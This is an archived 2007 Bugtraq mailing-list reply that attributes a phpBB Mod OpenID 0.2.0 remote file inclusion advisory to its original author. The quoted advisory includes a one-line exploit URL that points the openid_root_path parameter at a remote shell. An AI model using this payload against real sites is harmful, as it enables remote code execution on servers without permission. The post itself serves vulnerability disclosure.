Bugtraq mailing list archives
Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
From: str0ke <str0ke () milw0rm com>
Date: Mon, 01 Oct 2007 13:15:23 -0500
Seph1roth likes to cut and paste. original author = xoron. link: http://www.milw0rm.com/exploits/4471 /str0ke h3llcode () hotmail it wrote:
+++++++++++++++++++++++++++++++++++++++++++++++++++ + + phpBB Mod OpenID 0.2.0 BBStore.php RFI + Risk: High + Found by Seph1roth + Site: http://blackroots.it + +++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846 + Exploit: http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
Current thread:
- phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion h3llcode (Oct 01)
- Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion str0ke (Oct 01)